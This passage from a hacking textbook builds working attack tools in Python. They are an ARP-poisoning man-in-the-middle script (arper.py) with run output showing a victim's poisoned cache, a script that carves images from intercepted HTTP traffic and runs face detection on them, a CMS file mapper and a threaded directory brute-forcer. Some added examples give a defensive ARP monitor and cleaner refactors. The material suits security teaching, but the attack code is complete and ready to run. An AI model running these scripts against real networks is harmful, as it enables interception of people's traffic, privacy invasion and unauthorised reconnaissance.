    restore_target(gateway_ip,gateway_mac,target_ip,target_mac)  # ➏

except KeyboardInterrupt:
    # restore the network
    restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
    sys.exit(0)
This is the main setup portion of our attack. We start by resolving the gateway ➊ and target IP address's ➋ corresponding MAC addresses using a function called get_mac that we'll plumb in shortly. After we have accomplished that, we spin up a second thread to begin the actual ARP poisoning attack ➌. In our main thread, we start up a sniffer ➍ that will capture a preset amount of packets using a BPF filter to only capture traffic for our target IP address. When all of the packets have been captured, we write them out ➎ to a PCAP file so that we can open them in Wireshark or use our upcoming image carving script against them. When the attack is finished, we call our restore_target function ➏, which is responsible for putting the network back to the way it was before the ARP poisoning took place. Let's add the supporting functions now by punching in the following code above our previous code block:
def restore_target(gateway_ip,gateway_mac,target_ip,target_mac):

    # slightly different method using send
    print "[*] Restoring target..."
    send(ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst="ff:ff:ff:ff:ff:ff",hwsrc=gateway_mac),count=5)  # ➊
    send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst="ff:ff:ff:ff:ff:ff",hwsrc=target_mac),count=5)

    # signals the main thread to exit
    os.kill(os.getpid(), signal.SIGINT)  # ➋

def get_mac(ip_address):

    responses,unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10)  # ➌

    # return the MAC address from a response
    for s,r in responses:
        return r[Ether].src

    return None

def poison_target(gateway_ip,gateway_mac,target_ip,target_mac):

    poison_target = ARP()  # ➍
    poison_target.op = 2
    poison_target.psrc = gateway_ip
    poison_target.pdst = target_ip
    poison_target.hwdst= target_mac

    poison_gateway = ARP()  # ➎
    poison_gateway.op = 2
    poison_gateway.psrc = target_ip
    poison_gateway.pdst = gateway_ip
    poison_gateway.hwdst= gateway_mac

    print "[*] Beginning the ARP poison. [CTRL-C to stop]"

    while True:  # ➏
        try:
            send(poison_target)
            send(poison_gateway)

            time.sleep(2)
        except KeyboardInterrupt:
            restore_target(gateway_ip,gateway_mac,target_ip,target_mac)

    print "[*] ARP poison attack finished."
    return
So this is the meat and potatoes of the actual attack. Our restore_target function simply sends out the appropriate ARP packets to the network broadcast address ➊ to reset the ARP caches of the gateway and target machines. We also send a signal to the main thread ➋ to exit, which will be useful in case our poisoning thread runs into an issue or you hit CTRL-C on your keyboard. Our get_mac function is responsible for using the srp (send and receive packet) function ➌ to emit an ARP request to the specified IP address in order to resolve the MAC address associated with it. Our poison_target function builds up ARP requests for poisoning both the target IP ➍ and the gateway ➎. By poisoning both the gateway and the target IP address, we can see traffic flowing in and out of the target. We keep emitting these ARP requests ➏ in a loop to make sure that the respective ARP cache entries remain poisoned for the duration of our attack.

Let's take this bad boy for a spin!

Kicking the Tires
Before we begin, we need to first tell our local host machine that we can forward packets along to both the gateway and the target IP address. If you are on your Kali VM, enter the following command into your terminal:

#:> echo 1 > /proc/sys/net/ipv4/ip_forward

If you are an Apple fanboy, then use the following command:

fanboy:tmp justin$ sudo sysctl -w net.inet.ip.forwarding=1
Now that we have IP forwarding in place, let's fire up our script and check the ARP cache of our target machine. From your attacking machine, run the following (as root):

fanboy:tmp justin$ sudo python2.7 arper.py
WARNING: No route found for IPv6 destination :: (no default route?)
[*] Setting up en1
[*] Gateway 172.16.1.254 is at 3c:ea:4f:2b:41:f9
[*] Target 172.16.1.71 is at 00:22:5f:ec:38:3d
[*] Beginning the ARP poison. [CTRL-C to stop]
[*] Starting sniffer for 1000 packets
Awesome! No errors or other weirdness. Now let's validate the attack on our target machine:
C:\Users\Clare> arp -a

Interface: 172.16.1.71 --- 0xb
  Internet Address      Physical Address      Type
  172.16.1.64           10-40-f3-ab-71-02     dynamic
  172.16.1.254          10-40-f3-ab-71-02     dynamic
  172.16.1.255          ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
  224.0.0.251           01-00-5e-00-00-fb     static
  224.0.0.252           01-00-5e-00-00-fc     static
  255.255.255.255       ff-ff-ff-ff-ff-ff     static
You can now see that poor Clare (it's hard being married to a hacker, hackin' ain't easy, etc.) now has her ARP cache poisoned where the gateway now has the same MAC address as the attacking computer. You can clearly see in the entry above the gateway that I'm attacking from 172.16.1.64.

When the attack is finished capturing packets, you should see an arper.pcap file in the same directory as your script. You can of course do things such as force the target computer to proxy all of its traffic through a local instance of Burp or do any number of other nasty things. You might want to hang on to that PCAP for the next section on PCAP processing — you never know what you might find!
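The poisoned table above shows the two symptoms a network monitor can alarm on: the gateway's IP changing its MAC, and one MAC answering for two IPs. Here is an added example, not from the book, of a passive ARP monitor that flags exactly those; the trusted table and the sample replies are constructed from the addresses in this section, and in Scapy you would feed it from a sniff(filter="arp", ...) callback with p[ARP].psrc and p[ARP].hwsrc.

```python
from collections import defaultdict


def normalize_mac(mac):
    """Accept 3c-ea-4f-2b-41-f9 (Windows arp -a) as well as 3c:ea:4f:2b:41:f9 (Scapy)."""
    return mac.lower().replace("-", ":")


class ArpMonitor:
    """Passive monitor: feed it the (psrc, hwsrc) binding claimed by every ARP
    packet seen on the segment. It keeps the first binding learned for an IP (or a
    seeded trusted one) and reports conflicting claims. Legitimate causes of the
    same alerts exist (NIC replacement, VRRP/secondary addresses on one MAC), so
    treat an alert as something to investigate, not as proof of an attack."""

    def __init__(self, trusted=None):
        self.ip_to_mac = {ip: normalize_mac(m) for ip, m in (trusted or {}).items()}
        self.mac_to_ips = defaultdict(set)
        for ip, mac in self.ip_to_mac.items():
            self.mac_to_ips[mac].add(ip)
        self._reported = set()   # a poison loop repeats every 2s; alert on each fact once

    def _alert(self, kind, *detail):
        key = (kind,) + detail
        if key in self._reported:
            return None
        self._reported.add(key)
        return key

    def observe(self, psrc, hwsrc):
        """Process one ARP binding claim; return the list of new alert tuples."""
        mac = normalize_mac(hwsrc)
        alerts = []
        known = self.ip_to_mac.get(psrc)
        if known is None:
            self.ip_to_mac[psrc] = mac          # first sighting of this IP: learn it
        elif known != mac:
            a = self._alert("mac-changed", psrc, known, mac)
            if a:
                alerts.append(a)
        self.mac_to_ips[mac].add(psrc)
        if len(self.mac_to_ips[mac]) > 1:
            a = self._alert("mac-claims-multiple-ips", mac, tuple(sorted(self.mac_to_ips[mac])))
            if a:
                alerts.append(a)
        return alerts


def run_monitor(replies, trusted):
    """Replay a list of (psrc, hwsrc) claims through a fresh monitor; return all alerts."""
    mon = ArpMonitor(trusted)
    out = []
    for psrc, hwsrc in replies:
        out.extend(mon.observe(psrc, hwsrc))
    return out


# Seeded from the clean arp -a table earlier in this section.
TRUSTED = {"172.16.1.254": "3c-ea-4f-2b-41-f9"}

# Constructed sequence of ARP claims using the addresses from this section.
SAMPLE_REPLIES = [
    ("172.16.1.254", "3c:ea:4f:2b:41:f9"),   # gateway, consistent with TRUSTED
    ("172.16.1.64", "10:40:f3:ab:71:02"),    # another host announcing itself
    ("172.16.1.254", "10:40:f3:ab:71:02"),   # gateway IP now claimed by that host's MAC
    ("172.16.1.254", "10:40:f3:ab:71:02"),   # same claim repeated: no duplicate alert
]

if __name__ == "__main__":
    for alert in run_monitor(SAMPLE_REPLIES, TRUSTED):
        print("[!] %s: %s" % (alert[0], alert[1:]))
```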

PCAP Processing
Wireshark and other tools like Network Miner are great for interactively exploring packet capture files, but there will be times where you want to slice and dice PCAPs using Python and Scapy. Some great use cases are generating fuzzing test cases based on captured network traffic or even something as simple as replaying traffic that you have previously captured.

We are going to take a slightly different spin on this and attempt to carve out image files from HTTP traffic. With these image files in hand, we will use OpenCV,[9] a computer vision tool, to attempt to detect images that contain human faces so that we can narrow down images that might be interesting. We can use our previous ARP poisoning script to generate the PCAP files or you could extend the ARP poisoning sniffer to do on-the-fly facial detection of images while the target is browsing. Let's get started by dropping in the code necessary to perform the PCAP analysis. Open pic_carver.py and enter the following code:
import re
import zlib
import cv2

from scapy.all import *

pictures_directory = "/home/justin/pic_carver/pictures"
faces_directory = "/home/justin/pic_carver/faces"
pcap_file = "bhp.pcap"

def http_assembler(pcap_file):

    carved_images = 0
    faces_detected = 0

    a = rdpcap(pcap_file)  # ➊

    sessions = a.sessions()  # ➋

    for session in sessions:

        http_payload = ""

        for packet in sessions[session]:

            try:
                if packet[TCP].dport == 80 or packet[TCP].sport == 80:
                    # reassemble the stream  ➌
                    http_payload += str(packet[TCP].payload)
            except:
                pass

        headers = get_http_headers(http_payload)  # ➍

        if headers is None:
            continue

        image,image_type = extract_image(headers,http_payload)  # ➎

        if image is not None and image_type is not None:

            # store the image
            file_name = "%s-pic_carver_%d.%s" % (pcap_file,carved_images,image_type)  # ➏

            fd = open("%s/%s" % (pictures_directory,file_name),"wb")

            fd.write(image)
            fd.close()

            carved_images += 1

            # now attempt face detection
            try:
                result = face_detect("%s/%s" % (pictures_directory,file_name),file_name)  # ➐

                if result is True:
                    faces_detected += 1
            except:
                pass

    return carved_images, faces_detected

carved_images, faces_detected = http_assembler(pcap_file)

print "Extracted: %d images" % carved_images
print "Detected: %d faces" % faces_detected
This is the main skeleton logic of our entire script, and we will add in the supporting functions shortly. To start, we open the PCAP file for processing ➊. We take advantage of a beautiful feature of Scapy to automatically separate each TCP session ➋ into a dictionary. We use that and filter out only HTTP traffic, and then concatenate the payload of all of the HTTP traffic ➌ into a single buffer. This is effectively the same as right-clicking in Wireshark and selecting Follow TCP Stream. After we have the HTTP data reassembled, we pass it off to our HTTP header parsing function ➍, which will allow us to inspect the HTTP headers individually. After we validate that we are receiving an image back in an HTTP response, we extract the raw image ➎ and return the image type and the binary body of the image itself. This is not a bulletproof image extraction routine, but as you'll see, it works amazingly well. We store the extracted image ➏ and then pass the file path along to our facial detection routine ➐.

Now let's create the supporting functions by adding the following code above our http_assembler function.
def get_http_headers(http_payload):

    try:
        # split the headers off if it is HTTP traffic
        headers_raw = http_payload[:http_payload.index("\r\n\r\n")+2]

        # break out the headers
        headers = dict(re.findall(r"(?P<name>.*?): (?P<value>.*?)\r\n", headers_raw))
    except:
        return None

    if "Content-Type" not in headers:
        return None

    return headers

def extract_image(headers,http_payload):

    image = None
    image_type = None

    try:
        if "image" in headers['Content-Type']:

            # grab the image type and image body
            image_type = headers['Content-Type'].split("/")[1]
            image = http_payload[http_payload.index("\r\n\r\n")+4:]

            # if we detect compression decompress the image
            try:
                if "Content-Encoding" in headers.keys():
                    if headers['Content-Encoding'] == "gzip":
                        image = zlib.decompress(image, 16+zlib.MAX_WBITS)
                    elif headers['Content-Encoding'] == "deflate":
                        image = zlib.decompress(image)
            except:
                pass
    except:
        return None,None

    return image,image_type
These supporting functions help us to take a closer look at the HTTP data that we retrieved from our PCAP file. The get_http_headers function takes the raw HTTP traffic and splits out the headers using a regular expression. The extract_image function takes the HTTP headers and determines whether we received an image in the HTTP response. If we detect that the Content-Type header does indeed contain the image MIME type, we split out the type of image; and if there is compression applied to the image in transit, we attempt to decompress it before returning the image type and the raw image buffer.

Now let's drop in our facial detection code to determine if there is a human face in any of the images that we retrieved. Add the following code to pic_carver.py:
def face_detect(path,file_name):

    img = cv2.imread(path)  # ➊
    cascade = cv2.CascadeClassifier("haarcascade_frontalface_alt.xml")  # ➋
    rects = cascade.detectMultiScale(img, 1.3, 4, cv2.cv.CV_HAAR_SCALE_IMAGE, (20,20))

    if len(rects) == 0:
        return False

    rects[:, 2:] += rects[:, :2]

    # highlight the faces in the image
    for x1,y1,x2,y2 in rects:  # ➌
        cv2.rectangle(img,(x1,y1),(x2,y2),(127,255,0),2)

    cv2.imwrite("%s/%s-%s" % (faces_directory,pcap_file,file_name),img)  # ➍

    return True
This code was generously shared by Chris Fidao at http://www.fideloper.com/facial-detection/ with slight modifications by yours truly. Using the OpenCV Python bindings, we can read in the image ➊ and then apply a classifier ➋ that is trained in advance for detecting faces in a front-facing orientation. There are classifiers for profile (sideways) face detection, hands, fruit, and a whole host of other objects that you can try out for yourself. After the detection has been run, it will return rectangle coordinates that correspond to where the face was detected in the image. We then draw an actual green rectangle over that area ➌ and write out the resulting image ➍. Now let's take this all for a spin inside your Kali VM.

Kicking the Tires
If you haven't first installed the OpenCV libraries, run the following commands (again, thank you, Chris Fidao) from a terminal in your Kali VM:

#:> apt-get install python-opencv python-numpy python-scipy

This should install all of the necessary files needed to handle facial detection on our resulting images. We also need to grab the facial detection training file like so:

wget http://eclecti.cc/files/2008/03/haarcascade_frontalface_alt.xml

Now create a couple of directories for our output, drop in a PCAP, and run the script. This should look something like this:

#:> mkdir pictures
#:> mkdir faces
#:> python pic_carver.py
Extracted: 189 images
Detected: 32 faces
#:>
You might see a number of error messages being produced by OpenCV due to the fact that some of the images we fed into it may be corrupt or partially downloaded or their format might not be supported. (I'll leave building a robust image extraction and validation routine as a homework assignment for you.) If you crack open your faces directory, you should see a number of files with faces and magic green boxes drawn around them.
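For that homework, here is an added example (not the book's code; written for Python 3) of a stricter extractor: it walks every response in a reassembled stream rather than only the first, honours Content-Length and chunked framing so a truncated capture is skipped instead of written out, decodes gzip and deflate, and accepts a body only when it begins with the magic bytes of its declared image type. The sample stream is constructed inline; the image bodies are just magic bytes plus padding.

```python
import gzip
import zlib

# Magic bytes per accepted type; a body not starting with its declared type's magic
# is the corrupt/partial case that OpenCV would otherwise choke on.
MAGIC = {"png": b"\x89PNG\r\n\x1a\n", "jpeg": b"\xff\xd8\xff", "gif": b"GIF8"}


def parse_headers(raw):
    """Status line plus header lines (bytes) -> {lowercase-name: value}."""
    headers = {}
    for line in raw.split(b"\r\n")[1:]:          # [0] is the status line
        name, sep, value = line.partition(b":")
        if sep:
            headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return headers


def read_chunked(data):
    """Decode a chunked body: (body, bytes_consumed), or (None, 0) if truncated."""
    body, pos = b"", 0
    while True:
        nl = data.find(b"\r\n", pos)
        if nl < 0:
            return None, 0
        try:
            size = int(data[pos:nl].split(b";")[0].strip(), 16)   # drop chunk extensions
        except ValueError:
            return None, 0
        pos = nl + 2
        if size == 0:                                # last chunk, then optional trailers
            end = data.find(b"\r\n\r\n", pos - 2)
            return body, (end + 4 if end >= 0 else pos)
        if len(data) < pos + size + 2:
            return None, 0                           # capture ended mid-chunk
        body += data[pos:pos + size]
        pos += size + 2                              # skip the CRLF after the chunk


def decode_body(headers, body):
    enc = headers.get("content-encoding", "").lower()
    if enc == "gzip":
        return gzip.decompress(body)
    if enc == "deflate":
        try:
            return zlib.decompress(body)
        except zlib.error:
            return zlib.decompress(body, -zlib.MAX_WBITS)   # raw deflate from some servers
    return body


def extract_images(stream):
    """Walk a reassembled server->client stream; return [(subtype, body)] for each
    image response whose body is complete and starts with the expected magic."""
    images, pos = [], 0
    while True:
        start = stream.find(b"HTTP/1.", pos)
        if start < 0:
            break
        hdr_end = stream.find(b"\r\n\r\n", start)
        if hdr_end < 0:
            break
        headers = parse_headers(stream[start:hdr_end])
        body_start = hdr_end + 4
        if headers.get("transfer-encoding", "").lower() == "chunked":
            body, used = read_chunked(stream[body_start:])
            if body is None:
                break
            pos = body_start + used
        elif "content-length" in headers:
            length = int(headers["content-length"])
            body = stream[body_start:body_start + length]
            pos = body_start + length
            if len(body) < length:
                break                                # truncated capture: never emit it
        else:
            body, pos = stream[body_start:], len(stream)   # close-delimited body
        ctype = headers.get("content-type", "").split(";")[0].strip().lower()
        if not ctype.startswith("image/"):
            continue
        try:
            body = decode_body(headers, body)
        except (OSError, EOFError, zlib.error):
            continue                                 # bad compressed data: skip it
        subtype = ctype.split("/", 1)[1]
        magic = MAGIC.get("jpeg" if subtype == "jpg" else subtype)
        if magic and body.startswith(magic):
            images.append((subtype, body))
    return images


# Constructed sample: an HTML page, a gzip'd PNG, a chunked JPEG, a cut-off GIF.
PNG_BODY = MAGIC["png"] + b"\x00" * 16
JPEG_BODY = MAGIC["jpeg"] + b"\xe0" + b"\x00" * 16
PNG_GZ = gzip.compress(PNG_BODY)


def chunked(body, size=8):
    out = b"".join(b"%x\r\n%s\r\n" % (len(body[i:i + size]), body[i:i + size])
                   for i in range(0, len(body), size))
    return out + b"0\r\n\r\n"


SAMPLE_STREAM = (
    b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: 5\r\n\r\n<p>hi"
    + b"HTTP/1.1 200 OK\r\nContent-Type: image/png\r\nContent-Encoding: gzip\r\n"
    + b"Content-Length: %d\r\n\r\n" % len(PNG_GZ) + PNG_GZ
    + b"HTTP/1.1 200 OK\r\ncontent-type: image/jpeg\r\nTransfer-Encoding: chunked\r\n\r\n"
    + chunked(JPEG_BODY)
    + b"HTTP/1.1 200 OK\r\nContent-Type: image/gif\r\nContent-Length: 100\r\n\r\nGIF8"
)
```

To plug it into pic_carver.py you would feed it the per-session buffer that http_assembler builds and write each returned body out under its subtype.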
This technique can be used to determine what types of content your target is looking at, as well as to discover likely approaches via social engineering. You can of course extend this example beyond using it against carved images from PCAPs and use it in conjunction with web crawling and parsing techniques described in later chapters.
[8] http://www.secdev.org/projects/scapy/doc/installation.html#windows

[9] Check out OpenCV here: http://www.opencv.org/.

Chapter 5. Web Hackery
Analyzing web applications is absolutely critical for an attacker or penetration tester. In most modern networks, web applications present the largest attack surface and so are also the most common avenue for gaining access. There are a number of excellent web application tools that have been written in Python, including w3af, sqlmap, and others. Quite frankly, topics such as SQL injection have been beaten to death, and the tooling available is mature enough that we don't need to reinvent the wheel. Instead, we'll explore the basics of interacting with the Web using Python, and then build on this knowledge to create reconnaissance and brute-force tooling. You'll see how HTML parsing can be useful in creating brute forcers, recon tooling, and mining text-heavy sites. The idea is to create a few different tools to give you the fundamental skills you need to build any type of web application assessment tool that your particular attack scenario calls for.

The Socket Library of the Web: urllib2
Much like writing network tooling with the socket library, when you're creating tools to interact with web services, you'll use the urllib2 library. Let's take a look at making a very simple GET request to the No Starch Press website:

import urllib2

body = urllib2.urlopen("http://www.nostarch.com")  # ➊

print body.read()  # ➋
This is the simplest example of how to make a GET request to a website. Be mindful that we are just fetching the raw page from the No Starch website, and that no JavaScript or other client-side languages will execute. We simply pass in a URL to the urlopen function ➊ and it returns a file-like object that allows us to read back ➋ the body of what the remote web server returns. In most cases, however, you are going to want more finely grained control over how you make these requests, including being able to define specific headers, handle cookies, and create POST requests. urllib2 exposes a Request class that gives you this level of control. Below is an example of how to create the same GET request using the Request class and defining a custom User-Agent HTTP header:
import urllib2

url = "http://www.nostarch.com"

headers = {}  # ➊
headers['User-Agent'] = "Googlebot"

request = urllib2.Request(url,headers=headers)  # ➋
response = urllib2.urlopen(request)  # ➌

print response.read()
response.close()
The construction of a Request object is slightly different than our previous example. To create custom headers, you define a headers dictionary ➊, which allows you to then set the header key and value that you want to use. In this case, we're going to make our Python script appear to be the Googlebot. We then create our Request object and pass in the url and the headers dictionary ➋, and then pass the Request object to the urlopen function call ➌. This returns a normal file-like object that we can use to read in the data from the remote website.

We now have the fundamental means to talk to web services and websites, so let's create some useful tooling for any web application attack or penetration test.

Mapping Open Source Web App Installations
Content management systems and blogging platforms such as Joomla, WordPress, and Drupal make starting a new blog or website simple, and they're relatively common in a shared hosting environment or even an enterprise network. All systems have their own challenges in terms of installation, configuration, and patch management, and these CMS suites are no exception. When an overworked sysadmin or a hapless web developer doesn't follow all security and installation procedures, it can be easy pickings for an attacker to gain access to the web server.

Because we can download any open source web application and locally determine its file and directory structure, we can create a purpose-built scanner that can hunt for all files that are reachable on the remote target. This can root out leftover installation files, directories that should be protected by .htaccess files, and other goodies that can assist an attacker in getting a toehold on the web server. This project also introduces you to using Python Queue objects, which allow us to build a large, thread-safe stack of items and have multiple threads pick items for processing. This will allow our scanner to run very rapidly. Let's open web_app_mapper.py and enter the following code:
import Queue
import threading
import os
import urllib2

threads = 10

target = "http://www.blackhatpython.com"  # ➊
directory = "/Users/justin/Downloads/joomla-3.1.1"
filters = [".jpg",".gif",".png",".css"]

os.chdir(directory)

web_paths = Queue.Queue()  # ➋

for r,d,f in os.walk("."):  # ➌
    for files in f:
        remote_path = "%s/%s" % (r,files)
        if remote_path.startswith("."):
            remote_path = remote_path[1:]
        if os.path.splitext(files)[1] not in filters:
            web_paths.put(remote_path)

def test_remote():
    while not web_paths.empty():  # ➍
        path = web_paths.get()
        url = "%s%s" % (target, path)

        request = urllib2.Request(url)

        try:
            response = urllib2.urlopen(request)
            content = response.read()

            print "[%d] => %s" % (response.code,path)  # ➎
            response.close()

        except urllib2.HTTPError as error:  # ➏
            #print "Failed %s" % error.code
            pass

for i in range(threads):  # ➐
    print "Spawning thread: %d" % i
    t = threading.Thread(target=test_remote)
    t.start()
We begin by defining the remote target website ➊ and the local directory into which we have downloaded and extracted the web application. We also create a simple list of file extensions that we are not interested in fingerprinting. This list can be different depending on the target application. The web_paths ➋ variable is our Queue object where we will store the files that we'll attempt to locate on the remote server. We then use the os.walk ➌ function to walk through all of the files and directories in the local web application directory. As we walk through the files and directories, we're building the full path to the target files and testing them against our filter list to make sure we are only looking for the file types we want. For each valid file we find locally, we add it to our web_paths Queue.

Looking at the bottom of the script ➐, we are creating a number of threads (as set at the top of the file) that will each be called the test_remote function. The test_remote function operates in a loop that will keep executing until the web_paths Queue is empty. On each iteration of the loop, we grab a path from the Queue ➍, add it to the target website's base path, and then attempt to retrieve it. If we're successful in retrieving the file, we output the HTTP status code and the full path to the file ➎. If the file is not found or is protected by an .htaccess file, this will cause urllib2 to throw an error, which we handle ➏ so the loop can continue executing.
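The path-collection and worker-thread pattern above, as an added Python 3 example that is not the book's code: it walks a constructed sample tree, applies the extension filter (with the leading dots that os.path.splitext() requires), and drains the queue with get_nowait() so workers never race between empty() and get(). The probe callable is an assumption standing in for the HTTP request, so the block runs offline.

```python
import os
import queue
import tempfile
import threading

# extensions to skip; note every entry is in ".ext" form so splitext() matches
FILTERS = {".jpg", ".gif", ".png", ".css"}


def collect_paths(directory, filters=FILTERS):
    """Return a queue.Queue of URL paths ("/admin/index.php") found under directory."""
    web_paths = queue.Queue()
    for root, _dirs, files in os.walk(directory):
        for name in files:
            if os.path.splitext(name)[1] in filters:
                continue
            local = os.path.join(root, name)
            # relative path with forward slashes and a leading "/" as used in the URL
            rel = os.path.relpath(local, directory).replace(os.sep, "/")
            web_paths.put("/" + rel)
    return web_paths


def drain(web_paths, probe, workers=10):
    """Run probe(path) across worker threads and return {path: probe result}.

    probe is any callable (hypothetical stand-in for the HTTP GET); the test
    uses a fake that needs no network.
    """
    results = {}
    lock = threading.Lock()

    def worker():
        while True:
            try:
                # get_nowait() avoids the empty()/get() race of the original script
                path = web_paths.get_nowait()
            except queue.Empty:
                return
            status = probe(path)
            with lock:
                results[path] = status
            web_paths.task_done()

    threads = [threading.Thread(target=worker) for _ in range(workers)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return results


def make_sample_app():
    """Constructed sample layout standing in for an unpacked CMS download."""
    root = tempfile.mkdtemp()
    for rel in ("README.txt", "admin/index.php", "admin/logo.png", "css/site.css"):
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        open(full, "w").close()
    return root


if __name__ == "__main__":
    app = make_sample_app()
    fake_probe = lambda p: 200 if p.endswith(".php") else 404
    for path, code in sorted(drain(collect_paths(app), fake_probe).items()):
        print("[%d] => %s" % (code, path))
```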

Kicking the Tires

For testing purposes, I installed Joomla 3.1.1 into my Kali VM, but you can use any open source web application that you can quickly deploy or that you have running already. When you run web_app_mapper.py, you should see output like the following:
Spawning thread: 0
Spawning thread: 1
Spawning thread: 2
Spawning thread: 3
Spawning thread: 4
Spawning thread: 5
Spawning thread: 6
Spawning thread: 7
Spawning thread: 8
Spawning thread: 9
[200] => /htaccess.txt
[200] => /web.config.txt
[200] => /LICENSE.txt
[200] => /README.txt
[200] => /administrator/cache/index.html
[200] => /administrator/components/index.html
[200] => /administrator/components/com_admin/controller.php
[200] => /administrator/components/com_admin/script.php
[200] => /administrator/components/com_admin/admin.xml
[200] => /administrator/components/com_admin/admin.php
[200] => /administrator/components/com_admin/helpers/index.html
[200] => /administrator/components/com_admin/controllers/index.html
[200] => /administrator/components/com_admin/index.html
[200] => /administrator/components/com_admin/helpers/html/index.html
[200] => /administrator/components/com_admin/models/index.html
[200] => /administrator/components/com_admin/models/profile.php
[200] => /administrator/components/com_admin/controllers/profile.php
You can see that we are picking up some valid results including some .txt files and XML files. Of course, you can build additional intelligence into the script to only return files you're interested in, such as those with the word install in them.

Brute-Forcing Directories and File Locations

The previous example assumed a lot of knowledge about your target. But in many cases where you're attacking a custom web application or large e-commerce system, you won't be aware of all of the files accessible on the web server. Generally, you'll deploy a spider, such as the one included in Burp Suite, to crawl the target website in order to discover as much of the web application as possible. However, in a lot of cases there are configuration files, leftover development files, debugging scripts, and other security breadcrumbs that can provide sensitive information or expose functionality that the software developer did not intend. The only way to discover this content is to use a brute-forcing tool to hunt down common filenames and directories.

We'll build a simple tool that will accept wordlists from common brute forcers such as the DirBuster project[10] or SVNDigger,[11] and attempt to discover directories and files that are reachable on the target web server. As before, we'll create a pool of threads to aggressively attempt to discover content. Let's start by creating some functionality to create a Queue out of a wordlist file. Open up a new file, name it content_bruter.py, and enter the following code:
import urllib2
import threading
import Queue
import urllib

threads = 50
target_url = "http://testphp.vulnweb.com"
wordlist_file = "/tmp/all.txt"  # from SVNDigger
resume = None
user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0"

def build_wordlist(wordlist_file):
    # read in the word list
➊     fd = open(wordlist_file, "rb")
    raw_words = fd.readlines()
    fd.close()

    found_resume = False
    words = Queue.Queue()

➋     for word in raw_words:
        word = word.rstrip()
        if resume is not None:
            if found_resume:
                words.put(word)
            else:
                if word == resume:
                    found_resume = True
                    print "Resuming wordlist from: %s" % resume
        else:
            words.put(word)
    return words
This helper function is pretty straightforward. We read in a wordlist file ➊ and then begin iterating over each line in the file ➋. We have some built-in functionality that allows us to resume a brute-forcing session if our network connectivity is interrupted or the target site goes down. This can be achieved by simply setting the resume variable to the last path that the brute forcer tried. When the entire file has been parsed, we return a Queue full of words to use in our actual brute-forcing function. We will reuse this function later in this chapter.

We want some basic functionality to be available to our brute-forcing script. The first is the ability to apply a list of extensions to test for when making requests. In some cases, you want to try not only the /admin directory, for example, but admin.php, admin.inc, and admin.html.
def dir_bruter(word_queue, extensions=None):
    while not word_queue.empty():
        attempt = word_queue.get()
        attempt_list = []

        # check to see if there is a file extension; if not,
        # it's a directory path we're bruting
➊         if "." not in attempt:
            attempt_list.append("/%s/" % attempt)
        else:
            attempt_list.append("/%s" % attempt)

        # if we want to bruteforce extensions
➋         if extensions:
            for extension in extensions:
                attempt_list.append("/%s%s" % (attempt, extension))

        # iterate over our list of attempts
        for brute in attempt_list:
            url = "%s%s" % (target_url, urllib.quote(brute))
            try:
                headers = {}
➌                 headers["User-Agent"] = user_agent
                r = urllib2.Request(url, headers=headers)
                response = urllib2.urlopen(r)
➍                 if len(response.read()):
                    print "[%d] => %s" % (response.code, url)
            except urllib2.URLError as e:
                if hasattr(e, 'code') and e.code != 404:
➎                     print "!!! %d => %s" % (e.code, url)
                pass
Our dir_bruter function accepts a Queue object that is populated with words to use for brute-forcing and an optional list of file extensions to test. We begin by testing to see if there is a file extension in the current word ➊, and if there isn't, we treat it as a directory that we want to test for on the remote web server. If there is a list of file extensions passed in ➋, then we take the current word and apply each file extension that we want to test for. It can be useful here to think of using extensions like .orig and .bak on top of the regular programming language extensions. After we build a list of brute-forcing attempts, we set the User-Agent header to something innocuous ➌ and test the remote web server. If the response code is a 200, we output the URL ➍, and if we receive anything but a 404 we also output it ➎ because this could indicate something interesting on the remote web server aside from a "file not found" error.

It's useful to pay attention to and react to your output because, depending on the configuration of the remote web server, you may have to filter out more HTTP error codes in order to clean up your results. Let's finish out the script by setting up our wordlist, creating a list of extensions, and spinning up the brute-forcing threads.
word_queue = build_wordlist(wordlist_file)
extensions = [".php", ".bak", ".orig", ".inc"]

for i in range(threads):
    t = threading.Thread(target=dir_bruter, args=(word_queue, extensions,))
    t.start()
The code snip above is pretty straightforward and should look familiar by now. We get our list of words to brute-force, create a simple list of file extensions to test for, and then spin up a bunch of threads to do the brute-forcing.
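The two pieces of content_bruter.py that do not need a web server, the resumable wordlist loader and the per-word attempt list, as an added Python 3 example (not the book's code). The sample wordlist is constructed; it is not the SVNDigger file.

```python
import io
import queue
from urllib.parse import quote


def build_wordlist(lines, resume=None):
    """Queue each word; with resume set, skip everything up to and including it.

    Matches the original's semantics: the resume word itself is not re-queued,
    only the words after it are.
    """
    words = queue.Queue()
    found_resume = resume is None
    for raw in lines:
        word = raw.rstrip()
        if not word:
            continue
        if not found_resume:
            if word == resume:
                found_resume = True
            continue
        words.put(word)
    return words


def build_attempts(word, extensions=None):
    """Mirror dir_bruter: a word without a dot is tried as a directory, a word
    with one as a file, and each extension is appended on top."""
    attempts = []
    if "." not in word:
        attempts.append("/%s/" % word)
    else:
        attempts.append("/%s" % word)
    for ext in extensions or []:
        attempts.append("/%s%s" % (word, ext))
    return attempts


def build_url(target_url, path):
    # quote() keeps "/" and "." as-is but encodes spaces and other unsafe bytes,
    # so wordlist entries with odd characters still form a valid request line
    return target_url + quote(path)


def classify(status, body_len):
    """The script's reporting rule: "hit" for a 200 with a body, "note" for
    any error other than 404 (worth a look), None for everything else."""
    if status == 200:
        return "hit" if body_len else None
    return None if status == 404 else "note"


# Constructed sample wordlist (five entries, one per line)
SAMPLE_WORDS = "admin\nindex.bak\nbackup\ncgi-bin\nCVS\n"


if __name__ == "__main__":
    q = build_wordlist(io.StringIO(SAMPLE_WORDS), resume="backup")
    while not q.empty():
        for attempt in build_attempts(q.get(), [".php", ".bak"]):
            print(build_url("http://testphp.vulnweb.com", attempt))
```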

Kicking the Tires

